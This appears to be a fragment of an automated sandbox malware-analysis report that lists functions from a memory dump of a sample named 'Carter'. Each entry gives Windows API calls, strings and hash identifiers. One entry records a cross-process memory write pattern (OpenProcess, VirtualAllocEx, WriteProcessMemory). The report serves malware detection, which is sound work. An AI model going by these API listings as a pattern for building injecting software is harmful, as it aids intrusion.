                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 5169496984f2102d6b5c096821080db73d64a2f8811b05a2c5dc41229dbf223e
                                                                            • Instruction ID: acb0c94a875d22e5d674ced287b8365b02a17492c4ea2d54c5a42a38c7e0fd0d
                                                                            • Opcode Fuzzy Hash: 5169496984f2102d6b5c096821080db73d64a2f8811b05a2c5dc41229dbf223e
                                                                            • Instruction Fuzzy Hash: F3F0AF34211205AFEB160FB4EC98F6B3BACEF49B54F04421AF946C2190CB609D10DB60
                                                                            Function 002CCD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002CCD90
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 002CCDA7
                                                                            • MessageBeep.USER32(00000000), ref: 002CCDBF
                                                                            • KillTimer.USER32(?,0000040A), ref: 002CCDDB
                                                                            • EndDialog.USER32(?,00000001), ref: 002CCDF5
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: a2c9b779fa186f3781332db394e22d133ec9acf9f654a43dc6baff9d3d58de76
                                                                            • Instruction ID: 89e2c0b663787221c7a6f1f801de7e178d49458f4d3d5d8bbd9ad472cb53aa24
                                                                            • Opcode Fuzzy Hash: a2c9b779fa186f3781332db394e22d133ec9acf9f654a43dc6baff9d3d58de76
                                                                            • Instruction Fuzzy Hash: 9601A230511708ABEB265F24DD5EFA67B7CFB00701F04076EE587A10E1DBE1A9648B80
                                                                            Function 0027178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 0027179B
                                                                            • StrokeAndFillPath.GDI32(?,?,002ABBC9,00000000,?), ref: 002717B7
                                                                            • SelectObject.GDI32(?,00000000), ref: 002717CA
                                                                            • DeleteObject.GDI32 ref: 002717DD
                                                                            • StrokePath.GDI32(?), ref: 002717F8
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: f167b84e19cf9fdf5bf44e56b4843ab65b3a927336910ca4f80b3b1579167988
                                                                            • Instruction ID: 7b53f822e4d6b9a687c737356d47a7200a1b844c8fdc6e4c0ed40735c8015d98
                                                                            • Opcode Fuzzy Hash: f167b84e19cf9fdf5bf44e56b4843ab65b3a927336910ca4f80b3b1579167988
                                                                            • Instruction Fuzzy Hash: 55F01970019209ABDB3B5F29EC8DB587BACAB01322F04C215F52D481F0C73089A6DF10
                                                                            Function 002DC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 002DCA75
                                                                            • CoCreateInstance.OLE32(00303D3C,00000000,00000001,00303BAC,?), ref: 002DCA8D
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • CoUninitialize.OLE32 ref: 002DCCFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                            • String ID: .lnk
                                                                            • API String ID: 2683427295-24824748
                                                                            • Opcode ID: 9bc6155d7645f7c54b358c36dfaeb21b3a2b8da8b46d3cdc8f72a4987429864c
                                                                            • Instruction ID: 076bb021684b92f05239042064575e52e9d182d46f630b2249155977e3ea8a55
                                                                            • Opcode Fuzzy Hash: 9bc6155d7645f7c54b358c36dfaeb21b3a2b8da8b46d3cdc8f72a4987429864c
                                                                            • Instruction Fuzzy Hash: 8CA14B71114205AFD304EF64D891EABB7ECEF94704F00891DF15997292EB70EA19CF92
                                                                            Function 0027E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 00281680: _memmove.LIBCMT ref: 002816DB
                                                                            • __swprintf.LIBCMT ref: 0027E598
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0027E431
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 1943609520-557222456
                                                                            • Opcode ID: bde3c260924315a993332bc99a92100f41b6ed20eb08a8d0451a774fbcc1ad0e
                                                                            • Instruction ID: 298ca5089b3809b40d9a66d41b8fdf5add25e8d530e12216982912482a4cdf41
                                                                            • Opcode Fuzzy Hash: bde3c260924315a993332bc99a92100f41b6ed20eb08a8d0451a774fbcc1ad0e
                                                                            • Instruction Fuzzy Hash: AC91AE751242119FCB14FF24C895C6EB7A8EF99304F40491DF4859B2E1EA30ED65CFA2
                                                                            Function 0029523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 002952CD
                                                                              • Part of subcall function 002A0320: __87except.LIBCMT ref: 002A035B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__87except__start
                                                                            • String ID: pow
                                                                            • API String ID: 2905807303-2276729525
                                                                            • Opcode ID: ddd830f5225370e9abe65456f5a359dac4cb26ae1f56e4c28a8e84e77b1c6cb2
                                                                            • Instruction ID: 0ce3bbb2a38b8091bacd13699e2f0ffd09f349f23e304adcec2f9c0c4056f789
                                                                            • Opcode Fuzzy Hash: ddd830f5225370e9abe65456f5a359dac4cb26ae1f56e4c28a8e84e77b1c6cb2
                                                                            • Instruction Fuzzy Hash: 6F515E21F3AA0387CF17BF24C99137A6794AB42750F204D99E4C1451A5EF748CF89B46
                                                                            Function 00290654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$+
                                                                            • API String ID: 0-2552117581
                                                                            • Opcode ID: 2399034b15a2e53f32637e42a6c7f1ac81c708270ab2467d867e77d25d235b10
                                                                            • Instruction ID: e5f14eacc1b3dfb99c54f8a05df2f650cc050924e6d7846f449436edb198ee87
                                                                            • Opcode Fuzzy Hash: 2399034b15a2e53f32637e42a6c7f1ac81c708270ab2467d867e77d25d235b10
                                                                            • Instruction Fuzzy Hash: FF51237552025ACFDF15EF68C488AFABBA4EF55320F140259F8819B2D0D734AC66CB61
                                                                            Function 0027E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_free
                                                                            • String ID: #V(
                                                                            • API String ID: 2620147621-471757699
                                                                            • Opcode ID: 71d8fd1cf800d2aacfb9a7fb1206272bfca31d178b92821982125b7564db0f49
                                                                            • Instruction ID: fc94ce37ebd27b1fe22e857ccb90b32c8f3545e1cfebfdabba03db06294852aa
                                                                            • Opcode Fuzzy Hash: 71d8fd1cf800d2aacfb9a7fb1206272bfca31d178b92821982125b7564db0f49
                                                                            • Instruction Fuzzy Hash: 61516C716247428FDB24CF28C481B6FBBE5BF89354F05896DE48987250E731E821CB92
                                                                            Function 0028CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_memmove
                                                                            • String ID: ERCP
                                                                            • API String ID: 2532777613-1384759551
                                                                            • Opcode ID: a67530463e22d8d740990348a11bd6707e02eb1e4a7f5d566845ab6534609d64
                                                                            • Instruction ID: 5d46feef17fab57ee1165e123036a3772a20213c1f15a525a54695043100ab43
                                                                            • Opcode Fuzzy Hash: a67530463e22d8d740990348a11bd6707e02eb1e4a7f5d566845ab6534609d64
                                                                            • Instruction Fuzzy Hash: 7E51F87592130A9FDB24DF64C881BAABBF8EF04310F24856EE54ACB2C1E770D5A5CB50
                                                                            Function 002CA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002D1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C9E4E,?,?,00000034,00000800,?,00000034), ref: 002D1CE5
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002CA3F7
                                                                              • Part of subcall function 002D1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 002D1CB0
                                                                              • Part of subcall function 002D1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 002D1C08
                                                                              • Part of subcall function 002D1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002C9E12,00000034,?,?,00001004,00000000,00000000), ref: 002D1C18
                                                                              • Part of subcall function 002D1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002C9E12,00000034,?,?,00001004,00000000,00000000), ref: 002D1C2E
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002CA464
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002CA4B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 993ce845054cc6aac15b634fa97031b84cd2860677b62181a1c74b11533c64c4
                                                                            • Instruction ID: aa3bcc402d8cf9e23217fb6d164ac06094870994a79cfa0662cc6f740ceba4f3
                                                                            • Opcode Fuzzy Hash: 993ce845054cc6aac15b634fa97031b84cd2860677b62181a1c74b11533c64c4
                                                                            • Instruction Fuzzy Hash: 57413A7291121CBFDB24DFA4C985FDEB7B8EB45300F00419AFA45A7280DA716E65CBA1
                                                                            Function 002F79FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002F7A86
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002F7A9A
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F7ABE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 3a964c39a27ed1c1513641256c8a498d38d3f1aa9aaa47e1b225034d6dd9da63
                                                                            • Instruction ID: 49675034793ebb52aa105a98facb6893273ad8e60dce14f0635d7a73a8ff798e
                                                                            • Opcode Fuzzy Hash: 3a964c39a27ed1c1513641256c8a498d38d3f1aa9aaa47e1b225034d6dd9da63
                                                                            • Instruction Fuzzy Hash: 9A21B13262021DAFDF158F54CC82FEE7B69EB48754F120215FF156B190DAB1A8608B90
                                                                            Function 002F81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002F826F
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002F827D
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002F8284
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: bb7973cd36227d72d76afb4266c05b70639483237ff6deadf179db2849a48406
                                                                            • Instruction ID: b68c5a6bd739f7d01761d374640d7b1502c4c0233bf17767fd498071c83f2118
                                                                            • Opcode Fuzzy Hash: bb7973cd36227d72d76afb4266c05b70639483237ff6deadf179db2849a48406
                                                                            • Instruction Fuzzy Hash: F6216DB5614209AFDB11DF58CCC5DB7B7ADEB4A394F080159FA059B251CB71EC21CAA0
                                                                            Function 002F72D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002F7360
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002F7370
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002F7395
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: b975cbe0002b84e1d29ca5e06229649894e6f7937c4f638297f48378dfc27979
                                                                            • Instruction ID: fd1e723fd12f916d744b59198e8e0caf2b51081b9772ee414fba18341b7fd543
                                                                            • Opcode Fuzzy Hash: b975cbe0002b84e1d29ca5e06229649894e6f7937c4f638297f48378dfc27979
                                                                            • Instruction Fuzzy Hash: 1021D03262411DBFDF128F54CC85FBF77AAEB89794F018124FE049B190C671AC219BA0
                                                                            Function 002F6F45 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 002F6FC7
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002F6FD6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: ICTRLCREATEICON$edit
                                                                            • API String ID: 2978978980-3293527457
                                                                            • Opcode ID: 10a334e5e32fe7493ec131c4920db2ded508490461b385e06a60ef1f4cedf17d
                                                                            • Instruction ID: ebea005335e6a2943186483b070c9646c2a3f404d469ac57c2d1dfb9b07876d3
                                                                            • Opcode Fuzzy Hash: 10a334e5e32fe7493ec131c4920db2ded508490461b385e06a60ef1f4cedf17d
                                                                            • Instruction Fuzzy Hash: 4711607112120DAFEB114E64EC98EFB7B6AEB053A4F504724FA66935D0C771DC609B60
                                                                            Function 002AB4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002AB544: _memset.LIBCMT ref: 002AB551
                                                                              • Part of subcall function 00290B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002AB520,?,?,?,0027100A), ref: 00290B79
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0027100A), ref: 002AB524
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0027100A), ref: 002AB533
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002AB52E
                                                                            • =1, xrefs: 002AB514
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=1
                                                                            • API String ID: 3158253471-2775356207
                                                                            • Opcode ID: 5ee21d0c1594173840f81fc9209bb8f7587467788307d764fab3ae29c130b3a6
                                                                            • Instruction ID: 845b69b790b7e2f973a2daaf5514a07ffd7f86868e70fd6176030bc3a861ab81
                                                                            • Opcode Fuzzy Hash: 5ee21d0c1594173840f81fc9209bb8f7587467788307d764fab3ae29c130b3a6
                                                                            • Instruction Fuzzy Hash: A3E092B06103118FD336AF35E455B467BE8AF04304F00895EE446C2741DBB4E554CF91
                                                                            Function 002EC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,002B027A,?), ref: 002EC6E7
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002EC6F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
                                                                            • Opcode ID: c776012907f881e7172274429b1a67f5de7e6ba8540e345a7e22f528ef94e908
                                                                            • Instruction ID: ae443ed7a5823759c01b3c3752f7dcfa321f88e1fef52e0579dfdb0ffc380f50
                                                                            • Opcode Fuzzy Hash: c776012907f881e7172274429b1a67f5de7e6ba8540e345a7e22f528ef94e908
